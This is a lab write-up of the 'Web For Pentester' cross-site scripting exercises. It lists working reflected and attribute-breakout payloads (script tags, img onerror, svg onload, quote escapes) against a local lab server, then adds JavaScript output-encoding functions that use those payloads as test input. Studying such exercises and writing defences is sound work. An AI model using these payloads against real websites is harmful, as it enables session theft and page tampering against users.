XSS - Web For Pentester

The document discusses examples of cross-site scripting (XSS) vulnerabilities and payloads to exploit them. Various payloads are inserted into URLs to trigger alerts, inject HTML, and extract the domain. The examples cover different XSS contexts like reflected, stored, and DOM-based XSS. Later examples escape quotes and delimiters to craft payloads that work in different environments.

XSS

Example 1:

URL: http://192.168.1.3/xss/example1.php?name=hacker

Alert:

URL: http://192.168.1.3/xss/example1.php?name=<script>alert(1)</script>

Getting the domain:

No cookies are used in the application, so as a PoC we will exfiltrate the document.domain:

Payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

URL: http://192.168.1.3/xss/example1.php?name=<img src=AAAAAAAAA onerror=alert(document.domain) />

Example 2:

URL: http://192.168.1.3/xss/example2.php?name=hacker

HTML Injection:

URL: http://192.168.1.3/xss/example2.php?name=<b>alert(1)</b>

Alert:

Payload:

<SCRIPT>alert(1)</SCRIPT>

URL: http://192.168.1.3/xss/example2.php?name=<SCRIPT>alert(1)</SCRIPT>

Getting the domain:

No cookies are used in the application, so as a PoC we will exfiltrate the document.domain:

Payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

URL: http://192.168.1.3/xss/example2.php?name=<img src=AAAAAAAAA onerror=alert(document.domain) />

Example 3:

URL: http://192.168.1.3/xss/example3.php?name=hacker

HTML Injection:

URL: http://192.168.1.3/xss/example3.php?name=<b>alert(1)</b>

Alert:

Payload:

<img src=AAAAAAAAA onerror=alert(1) />

Getting the Domain:

Payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

Example 4:

URL: http://192.168.1.3/xss/example4.php?name=hacker

I noticed that the payload:

<img src=AAAAAAAAA onerror=alert(document.domain) />

always works, so I took a whitebox approach.

Payload:

<svg/onload=alert('1')>

Example 5:

URL: http://192.168.1.3/xss/example5.php?name=hacker

We will use script tags and an alert alternative.

Payload:

window.confirm('xss')

URL: http://192.168.1.3/xss/example5.php?name=<script>window.confirm('xss')</script>

Example 6:

URL: http://192.168.1.3/xss/example6.php?name=hacker

Payload:

</script><script>alert(1)</script>

Example 7:

URL: http://192.168.1.3/xss/example7.php?name=hacker

We will escape the quotes and land in the JavaScript context:

Payload1:

http://192.168.1.3/xss/example7.php?name=';alert(1)

Payload2:

http://192.168.1.3/xss/example7.php?name=';alert(1)'

Payload3:

http://192.168.1.3/xss/example7.php?name=%27;alert(1);%27

Example 8:

URL: http://192.168.1.3/xss/example8.php

After some trial and error I ended up ‘reflecting’ the payload

Payload:

"/><script>alert(1)</script>

in the URL.

Example 9:

URL: http://192.168.1.3/xss/example9.php#hacker

We have to perform a DOM-Based XSS.

For this we need an old/vulnerable browser.

We will use Internet Explorer on Windows 7.
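As an added example that is not part of the original write-up, here is the defensive counterpart of the payloads in examples 1 to 8: context-aware output encoding for the HTML text, HTML attribute and JavaScript string contexts, applied to a hypothetical greeting page that reflects the name parameter the same way the exercises do. The page template, the function names and the payload list are assumptions made for the demonstration; the exercises themselves are PHP, and JavaScript is used here so the check runs stand-alone.

```javascript
// Added example, not the exercise's own code; names and template are assumed.
// HTML text context (examples 1-6): the characters that can open or close
// markup become entities, so "<script>" or "<img onerror=...>" stays text.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context (example 8): encode everything except alphanumerics,
// so the value can close neither the attribute nor the tag, however it is quoted.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// JavaScript string-literal context (example 7): hex/unicode escapes for every
// non-alphanumeric character, so ' ; and </script> cannot end the literal.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    return cp < 0x100 ? `\\x${cp.toString(16).padStart(2, "0")}` : `\\u{${cp.toString(16)}}`;
  });
}

// Hypothetical greeting page reflecting ?name= into all three contexts.
function renderGreeting(name) {
  return [
    `<p>Hello ${encodeHtml(name)}</p>`,
    `<input type="text" name="name" value="${encodeHtmlAttr(name)}">`,
    `<script>var name = '${encodeJsString(name)}';</script>`,
  ].join("\n");
}

// Structural check: a correctly encoded page contains exactly the template's
// own five tag openers and two string delimiters, whatever name was supplied.
function hasOnlyTemplateMarkup(html) {
  const lt = (html.match(/</g) || []).length;
  const quotes = (html.match(/'/g) || []).length;
  return lt === 5 && quotes === 2;
}

// Payloads taken from the write-up, constructed here as test input.
const PAYLOADS = [
  "<script>alert(1)</script>",
  "<img src=AAAAAAAAA onerror=alert(document.domain) />",
  "<svg/onload=alert('1')>",
  "';alert(1)",
  "\"/><script>alert(1)</script>",
  "</script><script>alert(1)</script>",
];
```

For the DOM-based case in example 9 the same principle applies on the client: data read from the URL fragment should be assigned to a text sink such as textContent, never to a markup-interpreting one.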
